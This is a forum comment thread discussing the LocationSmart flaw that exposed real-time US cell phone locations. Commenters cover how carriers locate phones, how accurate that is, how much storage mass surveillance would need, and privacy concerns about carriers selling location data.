It's not like the networks send a message out via every cell tower on the planet asking if $rolandog{'mobile_number'} is listening every time you get a call or text.
Whenever your phone is switched on, it regularly contacts the tower it's got the strongest signal from and says "Hi, it's rolandog's phone here, if you get a call for me, this is where I'm hanging out! kthxbye"
Well it would probably add a bit of time, and there are also cases like someone is kidnapped, the phone is still on them, but obviously we can't ask them to opt in right now. Not that any of that would justify having a system to sell your location, but presumably they thought they had it locked down so that consent was required (which it apparently was for XML version of the API).
I don't think the general public will care. I tried to warn people about security/surveillance for a while but people don't seem to care. I even used http://www.insecam.org/ to show people their children might end on the Internet, they just say "I don't have a camera" in my house. But they are not grasping my point, which is that technology is invasive to a point no one imagined before. Soon the facial camera of your fridge used to authenticate new food order you make through amazon will be on insecam if are not careful. And of course, the most dangerous thing, is not accessing a camera, microphone or location at time T, but it's the whole history, years, even decades of history of your every move. Nobody is perfect, don't tell me you'd never be at a place you shouldn't have been. Information is power, those with access to that information will control the society as a whole.
Anyone know of the minimum and maximum accuracy of the cell phone triangulation methods are? This article states that they were getting results from within a few hundred yards to 1.5 miles
And the scariest thing me in the article (besides being able to bypass the auth) is that they were able to send several requests and track movement in near real time. Did they really not have a request limiter in place?
No request limiter, but the API was kind of slow (few seconds per update). The API returned an accuracy value, but we found it was often underestimating the accuracy (i.e. when it said "3000m", we were getting closer to 500m).
There is coarse and fine location.https://androidforums.com/threads/question-regarding-the-cou... -- generally you will get a coarse location. Carriers can often get a precise location by querying the phone and enhancing the coarse (cell tower triangulation) with a GPS reading. Fine location is not going to be available on all handsets. It will be accurate to like 30 meters. Older handsets or those on 3G may not provide fine location.
For whatever it's worth, this service was unable to find any location for my phone that only connects over 2g, but had no problem tracking my 4g phone with startling accuracy.
This is true, but I suspect something else might be going on. LocationSmart said it couldn't find the location of my phone at all, but even if I'm visible to only one tower it should at least be able to narrow it down to the location of that tower.
"Phase II E911 rules require wireless service providers to provide more precise location information to PSAPs; specifically, the latitude and longitude of the caller. This information must be accurate to within 50 to 300 meters depending upon the type of location technology used."
So..300 mio connected devices, 2 bytes for location, some compression, 2 samples a minute -> 1 GB per min or about 1.5 TB per day. Thats easy storage for NSA, wonder how many years of data they have on everyone? Don't think for a minute they don't have an exception for the permission requirements
Would NSA require a third party website's API to amass phone geo-location data considering the fact that they might as well exploit the carrier provided APIs?
Two bytes for a location? If you're going to store latitude and longitude, you'll want to do it with signed fixed-precision numbers. Four decimal places if you don't care about accuracy too much plus up to 180 above and below zero. That means you'll need 26 bits (25 bits to store the data plus one bit for sign), and that covers one half of latitude and longitude. You'd need 52 bits to store a full set of coordinates, and since we're not barbarians we can round that up to a nice even 64 bits (I don't think there's anything relevant you can store in 12 bits...maybe carrier ID?)
Then you need to identify what device it's for, that's another 32 bits if you're being conservative. I'll ignore timestamp, since you could infer that from the location in the data store (assuming you have nice even 30s intervals), but it would otherwise be a bonus 64 bits.
That's 10TB, but also pretty useless because you've got a giant pile of u32s. If you were going to do this for real, you'd probably store the user's location with full precision for the first sample, then simply have diffs with a precision that assumes, say, the device isn't going to move faster than the speed of sound. The index is likely going to be pretty massive, and you'll constantly be reindexing because you're getting new data all the time (with a cardinality of 300M).
Even then, you're probably looking at something that's triple or quadruple that size. Let's say 40TB. That's only 14.6PB/year, which is not unreasonable storage for the government. But then you need to consider other things:
- You're ingesting 600M data points per minute. If you're only getting the minimum (96bits/user), that's over 7GB/s.
- But of course, it's probably not in a binary format (in the article, it was JSON and XML). Make that 50GB/s.
- Now you're parsing XML and JSON. That's not free when you're parsing 600M documents/minute. You'd likely have a pretty damn big server farm to ingest all this data.
- Your carriers need to be able to send that data to you, so they need to be equipped to (collectively) deliver 50GB/s of encoded location data; not to mention be able to dump the latest record for every customer in their location database twice per minute.
I wouldn't bet money that the government cares enough about every last device in the country to rig together such a big system only to keep track of where my grandmother's Jitterbug is. It's nonsensical to think that they couldn't just send an API request to AT&T or Verizon and be like "Hey guys, where's John Doe's phone been in the last week?" That's almost certainly more practical and cost effective in every way.
You are right, it would take a few more but my point was more that the amount of data is entirely within the scope of NSA et al. In fact, it was somewhat arbitrary to say two points a minute, reality is once every two minutes is enough to have a very good idea where somebody is or has gone to.
Why would they want this data? Because they want to be able to not just track in real time 'persons of interest' but also to recreate past movements to establish associations.
As to the difficulty (if any) for the major telecoms to provide such a feed - chump change to the NSA to assist in that matter, just like regular law enforcement pays for wiretaps.
Are there any US carriers that have been confirmed to not share location data with 3rd parties such as LocationSmart? LocationSmart boasts on their website that they can get the location of 95% of the cell phones in the US... how can I be that 5%?
A bit naive to believe that the soft power button or airplane mode disables periodic tower pings. A removable battery and shielded bag would be the minimum precaution.
Phones wake up about every 30 minutes or so when "powered off". Explicitly to report loction and perform background chores. So you are right. Even the removable battery is suspect. A foil/metal lined bag does the trick. Or a chip bag: https://www.google.com/amp/s/www.popularmechanics.com/techno...
Something I wonder reading this, hopefully some wireless experts can answer. In theory does locationsmart even need to onboard all telcos for this? Most smartphones have the hardware to talk to all telcos now, and in emergency situations they can roam onto other networks. Do lte devices ping other networks or do they only ping on the spectrum of their particular network?
I’ve heard stories of how telcos track down things like broken fridges etc that are adding noise to their network (and buy the owners a new fridge) so clearly they have the ability to track things that aren’t part of their network.
So we pay the carriers and they sell our locations to 3rd parties anyway?
I can't think of any business for which it should be reasonable to make additional money by selling the users data. If a service is for free, I can understand that somehow the bills have to be paid and that selling data is an obvious option here. But if you paid for a service you normally don't expect the service provider to sell your data anyway. That kind of business should be illegal IMHO.
After all the brouhaha with the Cambridge Analytics dataset, that only revealed data that people voluntarily submitted to a public service - I wonder if there's a congressional hearing about a service that allows to track anybody owning a cellphone (which is pretty much anybody) anytime, anywhere, with no recourse or opt-out? With heads of AT&T and other companies being interrogated by Congressmen, at least? And if not, why not?
T-Mobile and other carriers sell customers a service that uses this information to track other phones ON THE SAME ACCOUNT. The actual service is provided by a third party that, I assume, is privy to all customers tower contacts and thus the location. By the way, the service is usually accurate within 50 feet although I have found some bloopers where it was off by 500 feet.Each result even tells you how accurate it likely is.
I kinda had no clue 3rd-party services like this existed, and assumed realtime cellphone location data was only available to law enforcement in emergency situations... Cool..
I was referring specifically to the inevitability of observation technologies leaving outside their controllers' grasp and becoming increasingly ubiquitous.
... but as Brin observes, these tools are powerful. And the groups that exploit them will tend to become the powerful groups (because information is power).
So given that these tools, even when abused, don't lead to the kind of wanton destruction nuclear weapons do (that trigger our primal survival instincts), the odds of everyone on the planet generally refraining from accessing surveillance technologies when available are low, and those that do so will tend to become more powerful (and therefore spread the cultural meme that "hey, this stuff is okay in moderation").
By the way, I wonder, could a foreign state use these location services for spying on government and military officials and other interesting people? For example, create a fake marketing company and buy data for "targeted advertising".
I don’t believe the buggy API was ever restricted just to US IPs, so anyone in any country could have been tracking US phones since the API came out (in Jan 2017 or earlier).
Maybe this is not a security vulnerability, but a feature, intentionally put here as a backdoor. This would not be the first time such behaviours are observed.
Per the LocationSmart website: "95% of all wireless devices" so basically the entire population's location can be tracked in real-time by anyone willing to pay for this service. Insurance companies, your boss, etc.
Yes. Data only sims are just like your regular simcards except you pay to NOT make any calls from it. The rest everything works the same from a technical point of view.
To avoid this sort of information leak, they'd have to build out their own cell infrastructure. This would be prohibitively expensive, even for a company with as much money as Apple.
Operating as a MVNO wouldn't help; the parent carrier can still collect data from their customers.
Having not fully woken up this morning, I read & assumed the title as "LocationSmart Leaked Location Data for All Major U.S. [Aircraft] Carriers in Real Time" and freaked out a bit :)
I guarantee that by next week, this whole thing will be forgotten and nothing will have changed because privacy and surveillance are too abstract for most people -- they need to see all their personal information that's being collected. I admire the researcher's integrity for exposing it the right way (reporting it to CERT and the company itself), but going full Snowden would have had so much more impact on getting better privacy-preserving laws and technology.